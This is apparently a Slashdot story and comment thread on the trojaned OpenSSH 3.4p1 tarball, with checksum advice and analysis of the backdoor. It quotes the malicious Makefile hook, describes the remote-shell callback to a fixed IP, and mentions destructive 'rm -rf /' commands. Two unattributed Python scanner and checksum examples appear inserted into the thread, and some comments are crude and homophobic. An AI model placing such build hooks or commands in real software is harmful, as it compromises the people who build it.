
OpenSSH Package Trojaned

michael posted more than 12 years ago | from the md5-saves-lives dept.

Security 574

cperciva writes "The original story is here. And more details are available from the guy's weblog here." Here's a mirror of that email message. Another reader writes, "Not really a trojan because all it does is make a connection to 203.62.158.32:6667." Still another writes "The tarball of the portable OpenSSH on ftp.openbsd.org is trojaned. The backdoor is only used during build - generated binaries are fine." There isn't much authoritative information available, but this appears legitimate - please be careful if you're updating any of your machines with code from ftp.openbsd.org, and we'll update this story with more links as information is available. Update: 08/01 19:13 GMT by M : OpenSSH now has an advisory.


574 comments


fuck you. (-1, Offtopic)

sinserve (455889) | more than 12 years ago | (#3991141)

First piss.

Trolls (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991143)

All trolls are butt-spelunkers!

OpenBSD is holy! (0, Funny)

Anonymous Coward | more than 12 years ago | (#3991147)

It's official: OpenBSD is holy. The Pope just announced the security hole itself.

Another blow to the *BSD movement, losing the support of Atheists all over the globe...

Or something.

Re:OpenBSD is holy! (1)

lertl (455570) | more than 12 years ago | (#3991302)

This incident is not the fault of OpenBSD. Check their FAQ, www.openbsd.org (and so ftp.openbsd.org) is run on Solaris.

MD5 sums (5, Informative)

cheezycrust (138235) | more than 12 years ago | (#3991154)

From the newsgroup message [freebsd.org]:

This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system:
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

j00 R 0wn3d lol (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991158)

Um, what was that you said about open source security being SO superior?

This has never happened to a Microsoft product. Although I am sure the Slashdot crew of janitors and peons would have a field day if it did.

All I can say is, j00 R 0wn3d lol

Re: Ummm... actually it has (0)

Anonymous Coward | more than 12 years ago | (#3991237)

Actually this has happened to numerous microsoft apps. Not the least of which is Windows XP, which allows M$ to backdoor you whenever they please.

RTFM man, and stop being such a microsoft junkie. Microsoft has its place but doesn't deserve a pedestal. Flat out, it sucks.

203.62.158.32 (1)

bsDaemon (87307) | more than 12 years ago | (#3991160)

But...they don't have enough h4x0r green to be evil. Besides, why does it connect to the ircd port?

Re:203.62.158.32 (3, Insightful)

CrazyDuke (529195) | more than 12 years ago | (#3991200)

Packet kiddies like to have their zombies join an irc channel so they can tell the bots to ddos by just typing something like "!flood 127.0.0.1."

I dunno if that's what this one does though.

Re:203.62.158.32 (2, Informative)

jorleif (447241) | more than 12 years ago | (#3991214)

From the weblog:

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get M, it will spawn a shell

I guess this answers your question

Re:203.62.158.32 (1)

Dark Lord Seth (584963) | more than 12 years ago | (#3991246)

[14:20:15] *** Connecting to 203.62.158.32 (6667)
-
[14:20:17] *** Unable to connect (Connection refused)

[root@Server root]# nmap -sS -p 6667 203.62.158.32

Starting nmap V. 2.54BETA37 ( www.insecure.org/nmap/ )
The 1 scanned port on snsonline.net (203.62.158.32) is: closed

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds

I fail to see what's the use of this "trojan". It doesn't make sense for a script kiddie to try to connect to a closed port on a legitimate looking machine.

Re:203.62.158.32 (2, Insightful)

jorleif (447241) | more than 12 years ago | (#3991259)

Except if the port was closed recently when this whole thing came out?

Re:203.62.158.32 (5, Interesting)

Anonymous Coward | more than 12 years ago | (#3991299)

The machine was rebuilt from source and rebooted within an hour of finding out. It was pure luck that the person that found it asked me to look at the code, at which point I realised it was my ip.

Cheers,

^Sarge^

hmmm.... (4, Funny)

reaper20 (23396) | more than 12 years ago | (#3991161)

So the sources are bad but the binaries are good? Is today bizarro-world day or something?

Re:hmmm.... (4, Funny)

Chester K (145560) | more than 12 years ago | (#3991184)

So the sources are bad but the binaries are good? Is today bizarro-world day or something?

This is yet another example of why everyone should use proprietary closed source software! I bet nobody's ever been compromised through a trojan horse in the build process of Microsoft Word!

Re:hmmm.... (1)

archen (447353) | more than 12 years ago | (#3991254)

The joke's on you, MS Word IS the trojan! The payload is the insane fees they charge for office now that there's virtually no competition...

Re:hmmm.... (1)

Y Ddraig Goch (596795) | more than 12 years ago | (#3991283)

Maybe not during the build, but what about the security holes in Word? If you have an office full of MS Office Automation stuff and then disable the ability to run VBA code in Office what's the point? I'll stick with Open Source, the few holes there are get plugged much faster than with shrink wrapped software.

Re:hmmm.... (4, Informative)

ndecker (588441) | more than 12 years ago | (#3991223)

The trojan executes itself from the Makefile. It compiles a daemon that tries to contact 203.62.158.32 on port 6667 and offers a remote shell for the user compiling the package. After that all files involved are removed and the makefile changed to the original one. The compiled ssh should contain anything from ( this ??? ) trojan.

Further reading [freebsd.org]

Gentoo... (1)

Bush_man10 (461952) | more than 12 years ago | (#3991293)

I wonder what would happen if someone was installing Gentoo? :) Shitty deal if you ask me

Since its only a build issue... (2, Interesting)

LT4Ryan (178006) | more than 12 years ago | (#3991163)

Why not unplug your box from the network while building? After that it should be OK, seeing as how 'generated binaries are fine.'??

Or am I thinking far too simply for my own good again? :)

Re:Since its only a build issue... (0)

Anonymous Coward | more than 12 years ago | (#3991192)

Hmm.. in /usr/ports on BSD, there is a huge tree of Makefiles, most of which are nothing but a huge list of ftp-urls. 'Building' in BSD terms, is more like 'downloading and building' in Linux terms, so unplugging your box during a build is not such a good idea most of the time..

Re:Since its only a build issue... (3, Informative)

Fluffy the Cat (29157) | more than 12 years ago | (#3991206)

Or just edit openbsd-compat/Makefile.in and remove the line

@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

The backdoor code will still be there, but it won't be built. Or, alternatively, just wait for it to be fixed. Since the SSH binaries themselves aren't affected by this, binary packages from your distribution vendor should be fine.
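The two posts above describe the hook: a Makefile.in recipe that compiles a file, runs the result, and feeds its output to sh in the background, which is not something a normal build step does. As an added example (not code from OpenSSH or from anyone in this thread), here is a small triage scanner that opens an untrusted source tarball in memory and flags recipe lines that compile a program and then execute it on the same line. The sample tarball is constructed inline with the exact recipe line quoted above; the member path `openssh-3.4p1/openbsd-compat/Makefile.in` assumes the usual top-level directory, and the regex heuristic is mine.

```python
import io
import re
import tarfile

# Path of the hooked file, as named in the post above (top-level dir assumed).
SUSPECT_MEMBER = "openssh-3.4p1/openbsd-compat/Makefile.in"
# The recipe line quoted in the thread; used here only as sample input.
HOOK_LINE = "@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &"

# Heuristic (mine, not a project rule): a single recipe line that invokes
# $(CC) with "-o NAME" and then either runs ./NAME or hands a script to "sh ./".
# Build recipes compile and link; they do not normally execute what they just built.
COMPILE_AND_RUN = re.compile(r"\$\(CC\).*?-o\s+([\w.-]+).*?(\./\1\b|\bsh\s+\./)")
MAKEFILE_NAMES = ("Makefile", "Makefile.in", "Makefile.am", "GNUmakefile")


def build_sample_tarball() -> bytes:
    """Constructed in-memory tar.gz: one clean Makefile.in and one hooked one."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name: str, text: str) -> None:
            data = text.encode()
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))

        add("openssh-3.4p1/Makefile.in", "all: ssh\n\t$(CC) -o ssh ssh.c\n")
        add(SUSPECT_MEMBER, "all: libopenbsd-compat.a\n\t" + HOOK_LINE + "\n")
    return buf.getvalue()


def scan_tarball(tar_bytes: bytes) -> list:
    """Return (member, line number, line) for every recipe line that matches
    the compile-and-run heuristic in any makefile inside the tarball."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not member.isfile():
                continue
            if member.name.rsplit("/", 1)[-1] not in MAKEFILE_NAMES:
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for lineno, line in enumerate(text.splitlines(), 1):
                # Only recipe lines (tab-indented) can execute commands.
                if line.startswith("\t") and COMPILE_AND_RUN.search(line):
                    findings.append((member.name, lineno, line.strip()))
    return findings


if __name__ == "__main__":
    for name, lineno, line in scan_tarball(build_sample_tarball()):
        print(f"{name}:{lineno}: {line}")
```

Hits need a human look: configure scripts and some test targets legitimately compile and run small probe programs, so this is a prioritisation aid for reviewing a tarball whose checksum already failed, not a verdict.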

Irony (0, Flamebait)

Dark Lord Seth (584963) | more than 12 years ago | (#3991165)

OpenBSD being focussed on security and all...

Re:Irony (1)

JyB (132690) | more than 12 years ago | (#3991231)

This has nothing to do with OpenBSD, the trojaned package is hosted on a SUNsite, running Solaris.

Re:Irony (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3991232)

Oh shut up, it's more secure than any amusement-inspiring shit you run.

Re:Irony (1)

yatest5 (455123) | more than 12 years ago | (#3991243)

Oh shut up, it's more secure than any amusement-inspiring shit you run.

Ooh, someone's rattle has just been thrown out of their pram....

Slashdot Effect (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991167)

slashdot effect n.

1. Also spelled "/. effect"; what is said to have happened when taco's anus is virtually unreachable because too many shirt-lifters are hitting it after he posts a boring pro-lunix article on the popular Slashdot news service. The term is quite widely used by /. readers, including variants like "Oh my god, my asshole has been slashdotted again!"

2. In a perhaps inevitable generation, the term is being used to describe any similar effect from being butt-fucked by a large admiring crowd. This would better be described as a flash crowd.

FREE NELSON MANDELA

I'm surprised... (2, Insightful)

DJPenguin (17736) | more than 12 years ago | (#3991168)

...that this doesn't happen more often.

People keep harping on about how open source software means that they can trust downloaded source code, but who actually reads through the source code for something before they actually compile?

Usually it's just ./configure && make && make install.

James

Re:I'm surprised... (1)

rozza (449963) | more than 12 years ago | (#3991201)

Yep. Someone could just put an rm -rf / in the make install:(

Re:I'm surprised... (0)

Anonymous Coward | more than 12 years ago | (#3991204)

Not true, I sometimes scroll thru the readme file

Re:I'm surprised... (4, Interesting)

Queuetue (156269) | more than 12 years ago | (#3991217)

This shows why I trust OS peer-reviewed code... It only takes one curious person to find an exploit, and OSS allows that person to be anyone. This one was found in 6 hours, by someone who wasn't on the OpenBSD team or the OpenSSH team.

It's also why I spend (some say waste) a few idle cycles now and again just perusing code - it only takes one person to notice an anomaly. The more aggregate cycles spent reviewing code, the better the systems get.

Re:I'm surprised... (0)

Anonymous Coward | more than 12 years ago | (#3991247)

Few people, but few is > none... If anything, this is a case in point - the trojan was found!

Who knows what MS or other proprietary vendors are putting on your machine. This is particularly important outside the USA, where a trojanned Windows would be a major security risk to western european nations, who are increasingly being forced to consider the USA a hostile "rogue state" - only the USA is huge...

Re:I'm surprised... (1)

tps12 (105590) | more than 12 years ago | (#3991272)

I have considered this problem before. Basically, the time it takes to absorb the meaning of a project from its source code appears to be proportional to the square of the size of the code. This varies somewhat depending on the cleanliness of your design, but is a good rule of thumb.

What that means is, things the size of OpenOffice or Linux or Emacs require a huge time investment to even reach the point where you could spot these kinds of exploits or bugs.

So what's the solution? There are a few. One would be the creation of a business that audits code. They would maintain a database of "approved" code, and users would pay them small subscription fees and get all their code through them. If a user wants something not available in the database, he can submit the code for auditing and be notified when it passes.

Another solution would be a program that utilizes AI algorithms to look through other programs' source code. It would need to identify what a program is supposed to do, and then flag anything that does not contribute to its intended result. It would also need to look out for common exploitable errors, like buffer overflows. You'd Have to Be Truly brilliant to pull off a trojan like this with such a system in place. I wonder why something like this hasn't been written!

Re:I'm surprised... (0)

Anonymous Coward | more than 12 years ago | (#3991304)


Another solution would be a program that utilizes AI algorithms to look through other programs' source code. It would need to identify what a program is supposed to do, and then flag anything that does not contribute to its intended result. It would also need to look out for common exploitable errors, like buffer overflows. You'd Have to Be Truly brilliant to pull off a trojan like this with such a system in place. I wonder why something like this hasn't been written!

Yeah, me too, especially given all the humanlike AI programs available on Sourceforge. Damn lazy open source programmers -- hop to it!

Re:I'm surprised... (0)

Anonymous Coward | more than 12 years ago | (#3991294)

Actually, it does happen more often. irssi [irssi.org] , the popular IRC client, was recently backdoored in the same way.

This wouldn't have happened if it was JAVA (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#3991173)

We should all switch to a code-signed world.

Re:This wouldn't have happened if it was JAVA (1)

zero_offset (200586) | more than 12 years ago | (#3991276)

Ha. Java code-signing is just an afterthought.

COM components (aka ActiveX) via CAB files had better code-signing. And before you whine and bitch, it was the browser-side implementation that sucked. The signing was pretty rock-solid.

.NET has even better code authentication mechanisms.

But I bow to your basic argument. :)

Re:This wouldn't have happened if it was JAVA (0)

Anonymous Coward | more than 12 years ago | (#3991286)

JAVA

You mean Java?

Ha ha (-1)

RTFA Man (578488) | more than 12 years ago | (#3991174)

so much for that hallowed never-had-a-hole-in-default-install crap. OpenBSD is owned. Bitches.

That's funny (0, Redundant)

yatest5 (455123) | more than 12 years ago | (#3991175)

I thought all viruses were caused by MS Outlook?

Virus != Trojan (1)

Gekko (45112) | more than 12 years ago | (#3991216)

I know you're trying to be funny (or a troll), but a Trojan is not a virus. A Virus can leave a trojan, or a trojan can leave access to a virus, but they are not the same.

Oh my!!! (-1, Troll)

Anonymous Coward | more than 12 years ago | (#3991178)

Windows software doesn't have problems like this!

Wake up, Bill won the game.

Losers!

Re:Oh my!!! (0)

Anonymous Coward | more than 12 years ago | (#3991253)

Me thinks Bill gave a good part of his working force some time off today, so that they could stroll over to /. and unload their hatred upon an unsuspecting crowd of bewildered /.'ers who believed that OpenBsd could never be hacked. Shit happens, SNAFU. At least I (as a linux-user) don't have to agree to an EULA that *gives* legal rights to Micro$hit to have full control over my box. But hey, rant all you want, it's not every day *this* happens!

BTW, and if I did not mention it, the OS of BSOD's is so full of bugs and shit, my head spins just thinking about it; and I try every day to forget the days of horror when it was my profession to work with this piece of crap. General Protection Error, my ass!

Security, Antisecurity and a Purposeless Anecdote (4, Interesting)

f00Dave (251755) | more than 12 years ago | (#3991180)

On the one hand, there's stories about the improved security and paranoia [slashdot.org] of OpenSSH.

And on the other hand, there's stories like this one and that [slashdot.org] one about anti-security "features" in the same package.

Now, my question is this: is this indicative of open-source development projects, in general? [Yeah, it's faster to fix issues, but if the distros are *causing* issues in the first place, well.... ;-) ]

Reminds me of a company I worked for that was timebombed by a previous programmer. Unfortunately for him, when we looked at the source code, all was well (he'd copied the sources back over his modified ones used in the binary build) ... but he'd left the .bak files. Guess what was in the .bak files. Good, now guess how we discovered a few other potential surprises he'd left for the rest of us to encounter.

Anyway, I can't see how a disgruntled coder could really affect an open-source project, unless there's personality factors at play that I don't know about. Anyone have some meat on this OpenSSL mess?

suggestion: changing the main ftp openbsd site (2)

kipple (244681) | more than 12 years ago | (#3991181)

wouldn't it be better to change the 'main' openbsd site to be one of its current mirrors?
I suppose that a mirror has better chances to be managed with motivation and skill, surely more than a solaris box in a university actually has.

also, the mirror should run openbsd itself...

Re:suggestion: changing the main ftp openbsd site (0)

Anonymous Coward | more than 12 years ago | (#3991226)

http://www.openbsd.org/faq/faq8.html#wwwsolaris [openbsd.org]

pony up the money, cowboy.

How many people do check the MD5 checksum? (3, Insightful)

frleong (241095) | more than 12 years ago | (#3991182)

Do you check the packages downloaded from sites that you usually do not have problems with? Like from redhat.com, debian.org and in this case openbsd.org?

Also, how many people do read the makefiles before running them on your machine? And when installing binaries require root access?

If this story is really true, how much safer are open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover whether they are trojaned or not.

Re:How many people do check the MD5 checksum? (5, Informative)

GigsVT (208848) | more than 12 years ago | (#3991205)

The guy caught it because of the installer automatically checking the MD5 checksum. Someone would have to explicitly ignore the MD5 error to be hit by this.

The same is true of other systems like the Red Hat Network.

Re:How many people do check the MD5 checksum? (2)

norwoodites (226775) | more than 12 years ago | (#3991270)

except that on most OSes (unlike most BSDs) there is no ports system that checks the MD5, unless you do it by hand, and by then they could have changed the one on the ftp server also.

The port system includes MD5 sums when you download the port system or checkout it from cvs.

Re:How many people do check the MD5 checksum? (2, Informative)

GigsVT (208848) | more than 12 years ago | (#3991300)

except that on most OSes (unlike most BSDs) there is no ports system that checks the MD5, unless you do it by hand, and by then they could have changed the one on the ftp server also.

I don't know what OS you are talking about. Debian apt automatically [debian.org] checks MD5sums, Red Hat network uses cryptographic certificates to verify package integrity, even Windows has a package verification system.

Re:How many people do check the MD5 checksum? (4, Interesting)

stevey (64018) | more than 12 years ago | (#3991236)

Do you check the packages downloaded from sites that you usually do not have problems with?

I've been wondering about this - and the answer is almost certainly not.

I've written a fairly widespread mp3/ogg streamer [gnump3d.org] . I used to list MD5 sums on the download page - but recently I've switched to signing with my GPG key.

(On the basis that if somebody altered the downloads they'd be capable of fixing up the MD5sums file in the same directory too).

Taking a look at the download statistics [sourceforge.net] you can see that about 1 person in 50 downloaded the signature file to match their archive.

That suggests that 2% of people routinely check signatures. I assume that fewer people check the code than check the signatures so ... it's probably safe to say that no more than 0.5% of people do.

Re:How many people do check the MD5 checksum? (3, Interesting)

zmooc (33175) | more than 12 years ago | (#3991240)

What we need is a trusted 3rd party that has all the checksums. It should not be possible to change the keys without a GPG-signed message (or something similar) from the package-maintainer. Package-download-software should then automatically check the MD5-sum on the TTP server. Does anybody know if such service exists or if there are plans to set this up?

Re:How many people do check the MD5 checksum? (5, Interesting)

Quixote (154172) | more than 12 years ago | (#3991292)

That's what I was thinking, too.
We can model something along the lines of DNS, and have the download/build process do a 'lookup' on (say) openssh-3.4p1.packages.net, to get the MD5 sum, and compare it with what's on hand.

Never underestimate the power of a bunch of pissed-off nerds... :)

Re:How many people do check the MD5 checksum? (1)

Queuetue (156269) | more than 12 years ago | (#3991241)

Do you check the packages downloaded from sites that you usually do not have problems with? Like from redhat.com, debian.org and in this case openbsd.org?

Of course I do! You don't?

If this story is really true, how much safer are open-source programs, when compared with closed source programs? Notice that even with closed source programs, *some* people will eventually discover whether they are trojaned or not.

Well, this one was caught in 6 hours by someone who wasn't on the OpenSSH or the OpenBSD teams. I'd imagine if he was asleep at the switch, I believe someone else would have found it soon after.

Re:How many people do check the MD5 checksum? (1)

Lemuel (2370) | more than 12 years ago | (#3991257)

I never check the MD5 checksum because I figure that if someone can crack the file they can replace the checksum. Having said that, I understand that the checksum and file may be in different locations, but often they are not. It would probably still make sense to check, though. An MD5 mismatch would be meaningful even if a match may not be.

Re:How many people do check the MD5 checksum? (2, Insightful)

maxwell demon (590494) | more than 12 years ago | (#3991311)

Well, the problem with the md5 checksum is that it only protects against download errors, not against replacement at the server (unless you have an independent source for that checksum): It's trivial to calculate the checksum for the changed package, and if you manage to replace the package file, you most probably manage to replace the file with the md5 key as well.

The only way to really secure against such replacements is to use public-key cryptography to sign the package. Then no one can recreate the signature without having the private key.

Maybe for installing, a safer way would be to give the user account temporarily access to the destination directories, then install as a user, and finally change owner permissions by hand. Of course this won't work if installation consists of more than just copying files to other directories, and this extra stuff needs root permissions. However, I guess that's rare.
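The point made in the post above, and in the earlier posts quoting the FreeBSD ports checksums, is about where the expected digest comes from, not about the hash itself. As an added example (not code from the thread or from any project), the Python below carries both cases through: the ports-tree style check compares the digest recorded earlier from an independent channel with the digest of the fetched file, and a constructed server-compromise scenario shows that a checksum file sitting next to the tarball is rewritten along with it and therefore passes. The two MD5 values are the ones quoted in the thread; the tarball bytes are constructed stand-ins.

```python
import hashlib
import hmac

# The two checksums quoted earlier in this thread (FreeBSD ports tree vs.
# the tarball on the ftp server). Copied from the posts, not recomputed here.
PORTS_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
FTP_TARBALL_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"


def digest(data: bytes, algo: str = "md5") -> str:
    """Hex digest of a downloaded file. MD5 is what the thread uses; the same
    code works with "sha256", which is what a ports tree would pin today."""
    return hashlib.new(algo, data).hexdigest()


def checksum_matches(data: bytes, expected_hex: str, algo: str = "md5") -> bool:
    """Constant-time comparison of a file's digest with an expected value."""
    return hmac.compare_digest(digest(data, algo), expected_hex.lower())


def ports_style_check(ports_digest: str, fetched_digest: str) -> bool:
    """What the FreeBSD ports fetch did: compare the digest recorded in the
    ports tree (obtained independently, e.g. via a CVS checkout) with the
    digest of the file just fetched. Any mismatch must abort the build."""
    return hmac.compare_digest(ports_digest.lower(), fetched_digest.lower())


def simulate_server_compromise() -> dict:
    """Constructed scenario: the attacker replaces the tarball on the ftp
    server and also rewrites the MD5SUM file sitting next to it."""
    original = b"openssh-3.4p1 clean tarball (constructed stand-in bytes)"
    trojaned = original + b"\n+ openbsd-compat/bf-test.c"

    # Digest recorded earlier from an independent channel (the ports tree).
    pinned = digest(original)
    # Digest published next to the tarball; the attacker updated it too.
    colocated = digest(trojaned)

    return {
        # Checking against the co-located MD5SUM file cannot catch this.
        "colocated_check_passes": checksum_matches(trojaned, colocated),
        # Checking against the independently obtained digest does.
        "pinned_check_passes": checksum_matches(trojaned, pinned),
    }


if __name__ == "__main__":
    print("ports tree vs ftp tarball:", ports_style_check(PORTS_MD5, FTP_TARBALL_MD5))
    print(simulate_server_compromise())
```

The signed-package upgrade the post describes is the same idea with the independent channel replaced by a key obtained out of band: `gpg --verify openssh-3.4p1.tar.gz.sig openssh-3.4p1.tar.gz` only succeeds if the signer's private key was used, which a server-side attacker does not have.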

Checksum...? (5, Interesting)

DJPenguin (17736) | more than 12 years ago | (#3991183)

OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?

Re:Checksum...? (1)

Roofus (15591) | more than 12 years ago | (#3991220)

OK so they trojaned the source tar.gz, and uploaded it to the server somehow. So why did they not update the MD5SUM also?

The checksums were already on the user's FreeBSD machine.

This is another victory for Open Source!!! (1, Funny)

Anonymous Coward | more than 12 years ago | (#3991185)

Isn't it?

Idle curiosity (3, Informative)

Glytch (4881) | more than 12 years ago | (#3991186)

So, does apt-get use checksums and gpg signatures these days? Or are there thousands of debian machines out there just begging to be owned?

Re:Idle curiosity (4, Informative)

reeve (216640) | more than 12 years ago | (#3991296)

Yes, apt-get uses MD5 checksums, and I'm not sure about gpg signatures but Debian's build system uses them to check the sources.

Trojan (5, Interesting)

GigsVT (208848) | more than 12 years ago | (#3991188)

The C code is not that smart. It tries once per hour to connect to port 6667 on the machine 203.62.158.32 which is web.snsonline.net and waits for commands from the person or persons who 0wn3d the machine. Does it get an M, it sleeps for another hour. Does it get an A, it will abort. Does it get an M, it will spawn a shell. Some people will build it "normal" privileges and install it as root: they will get a shell with "normal" privileges. Other people will build it with "root" privileges and the shell will have "root" privileges.

Tell me how this isn't a trojan again? A remotely controllable program that could possibly give the attacker root access?

Re:Trojan (0)

Anonymous Coward | more than 12 years ago | (#3991256)

IP Address 203.62.158.32 resolves to:
OEMCOMPUTER


HAHAHAHAHAHAHAHAHAHHAHAHAAHA

Result of the Reverse Lookup
IP address Result
203.62.158.32 snsonline.net [more info for this domain name]

Re:Trojan (1, Insightful)

Anonymous Coward | more than 12 years ago | (#3991277)

Tell me how this isn't a trojan again?

It is a trojan, like the article title says. It's a completely independent program that a user is tricked into running on his own box that does something other than that user expects.

Quality control and open source (0)

Anonymous Coward | more than 12 years ago | (#3991191)

This is interesting. Open source developers are great, and we appreciate their contributions, but shouldn't there be some sort of open source code review? I understand that people that download the packages have the option to review the code, but I'm sure there's a lot that don't. Shouldn't some sort of change control/QC process be implemented before something is put up for the public's use?

Re:Quality control and open source (0)

Anonymous Coward | more than 12 years ago | (#3991285)

Hush, you heretic! the next thing we know, you'll be asking for (gasp!) a _warranty_ !!

It wasn't originally like that. (5, Informative)

Neon Spiral Injector (21234) | more than 12 years ago | (#3991193)

I got my copy of the OpenSSH source from ftp.openssh.org the day it was released, and mine doesn't contain the bf-test.c file and the MD5 checksum is correct.

So if the file was modified it happened later.

Re:It wasn't originally like that. (5, Informative)

Fluffy the Cat (29157) | more than 12 years ago | (#3991227)

So if the file was modified it happened later.

The datestamp on the modified file was Jul 31, so it does look like it's been changed recently.

Re:It wasn't originally like that. (1)

Sibeling (597639) | more than 12 years ago | (#3991301)

It's rumored to be only in Portable releases of openssh. Hence the p1 in 3.4p1. An interesting read is the thread it created on the FreeBSD list [freebsd.org]

Another reason.. (0)

prisen (578061) | more than 12 years ago | (#3991194)

to subscribe to Bugtraq [securityfocus.com] or a similar security mailing list. Especially you guys that run any type of server. Securityfocus [securityfocus.com] is your friend; they'll have these advisories far in advance of any other place on the net.

what's up with OpenBSD? (0, Troll)

tps12 (105590) | more than 12 years ago | (#3991209)

I don't mean to be making a "*BSD is Dying" post, but what's the deal? This is the second problem with OpenSSH in a few months, and OpenSSL was exploited just a few days ago.

Is OpenBSD in trouble? More importantly, what are security-conscious people switching to, now that OpenBSD is no longer the fortress it once was?

Re:what's up with OpenBSD? (1)

JyB (132690) | more than 12 years ago | (#3991244)

This has nothing to do with *BSD.

A package was trojaned on a SUNsite. Where's BSD in this ?

BTW, OpenSSL has nothing to do with *BSD. And the bug in OpenSSH was ... well ... shit happens, it's still humans who are coding ...

Re:what's up with OpenBSD? (0)

Anonymous Coward | more than 12 years ago | (#3991245)

OpenSSL is a completely separate project that OpenBSD (and just about every other vendor) happens to bundle.

Re:what's up with OpenBSD? (0)

Anonymous Coward | more than 12 years ago | (#3991282)

Just because "Open" is in the name of "OpenSSL", you automatically assume the OpenBSD people are the same people behind OpenSSL? That's not the case.

And why is OpenBSD in trouble? If you think OpenBSD is in trouble because of the bugs in Apache and OpenSSH, then I can assume you think RedHat is in a shitload of trouble (compare errata pages).

There are always bugs, and there always will be. Where software gets written, bugs are made. It's just that some OS developers (like the OpenBSD developers) tend to spend more time searching for those bugs than others.

Re:what's up with OpenBSD? (1)

Militant (26707) | more than 12 years ago | (#3991312)

I am security conscious... and I am sticking with OpenBSD. It is still a strongly fortified OS. All of this software is secondary to the core OS.

OpenSSL is outside of OpenBSD, and has nothing to do with them. Everyone got affected the same.

They found the first remote exploit to affect OpenSSH in a long time (years) recently. Most people weren't affected. Ironically, it was OpenBSD's extra secure defaults that were vulnerable. Shit happens. The community was quick to patch their systems. Is Linux dying because it can be raped every week?

It appears the trojan was inserted after the initial release. So someone may have broken into the server. I believe the server is at the University of Calgary. Not Theo De Raadt's basement.

Why don't we wait to find out what happened? I guarantee this isn't being taken lightly.

Thanks

Re:what's up with OpenBSD? (2, Interesting)

Mercaptan (257186) | more than 12 years ago | (#3991313)

It's not in any trouble at all.

OpenBSD is less of a fortress and more of a flexible defense. In this case, even though the integrity of the centralized source code was compromised, any end-user who accessed it via the ports tree was immediately tipped off that something wasn't kosher. They could then communicate this to other users and the maintainers of OpenBSD and thus make this attack known to the public within hours of it happening. And due to the ease of updating that the ports tree provides, the maintainers of OpenBSD can correct this problem very quickly. This sort of suppleness provides for the best kind of broadband defense, whereas a "fortress" cannot brook much weakness in any of its parts and is far more brittle. Had users not been able to see the disparity (via MD5 sums), or not been able to communicate it to their fellow users, or not have been able to easily obtain a clean copy, then the problem may have been easily transmitted to a large number of operating OpenBSD machines. As it was, the problem got nipped at the bud.

This event would be the sort of reason why security-conscious people should stick with OpenBSD.

Trojan executes code read via /bin/sh (3, Informative)

XTaran (70498) | more than 12 years ago | (#3991211)

Not really a trojan because all it does is make a connection to 203.62.158.32:6667

But it reads from the connection and executes the read code via /bin/sh. You call this not a trojan?

Trojaned source distributions (5, Interesting)

dzym (544085) | more than 12 years ago | (#3991218)

So far we've seen dsniff and other programs from monkey.org trojaned [linuxsecurity.com] , irssi [irssi.org] , BitchX [securityfocus.com] , and now OpenSSH.

At this point I think we need to make the assumption that the problem is a bit more common than viewing these compromises individually would suggest, and perhaps these individual events can even be linked together.

And for the developers out there, I think it's time to check over all of your current distributed source tarballs.

How to stop this happening again? (1)

uchian (454825) | more than 12 years ago | (#3991221)

This is the one area with open source which I am surprised has not been exploited earlier, and it's a problem I'm not sure how to avoid.

We see that the "many eyes" on open source seem to work pretty damn quickly, but the question is, how much damage could someone do in the time it takes for people to notice? Most software needs to be installed as root, and most people blindly install software without checking the make files to see what they do. Because it is run as root, you are leaving your machine wide open to anything the trojan wants to do.

yes | rm -r /

The trouble is, a normal virus checker wouldn't be any use against this kind of trojan as most damage is caused before the trojan is noticed.

Has anyone else thought about ways to solve this problem?

Re:How to stop this happening again? (0, Troll)

yatest5 (455123) | more than 12 years ago | (#3991233)

Has anyone else thought about ways to solve this problem?

Buy software produced by professionals?

Re:How to stop this happening again? (0)

Anonymous Coward | more than 12 years ago | (#3991275)

Buy software produced by professionals?

Yeah, and I suppose you say 'microsoft' is a professional?

Re:How to stop this happening again? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#3991255)

hey douchebag, howabout you show everyone you have the lamest idea of what unix is.. oh wait, you did.

rm -rf /

would be better suited to your needs.

move along, nothing to see here.

Re:How to stop this happening again? (0)

Anonymous Coward | more than 12 years ago | (#3991266)

It's MORE of a problem with closed-source. At least with open-source, you have some chance of discovering the trojan - the US government could be right now using undisclosed backdoors and trojans in closed-source packages for industrial espionage against western europe. They've done it before.

Re:How to stop this happening again? (1)

ndecker (588441) | more than 12 years ago | (#3991289)

Has anyone else thought about ways to solve this problem?

I think there are two types of solutions:

  • Technical: with ACLs and capabilities, it should be possible to restrict the damage that could be done by an installer. It might allow the installer to change the files belonging to the package and disallow any daemons running after the install and any network connections.

    These technical measures will provide some protection from simple attacks, but the attacker will know these measures too. There will be ways to bypass them.

  • Social: Every package could be signed by some person. This signature could be checked on install. The problem is that there are very few people trusted by everyone. These people probably couldn't check every update to every free package. If there are more, non-prominent "signers", it could be possible for some bad person to be considered trusted.

Re:How to stop this happening again? (2, Insightful)

tburkhol (121842) | more than 12 years ago | (#3991306)

Has anyone else thought about ways to solve this problem?

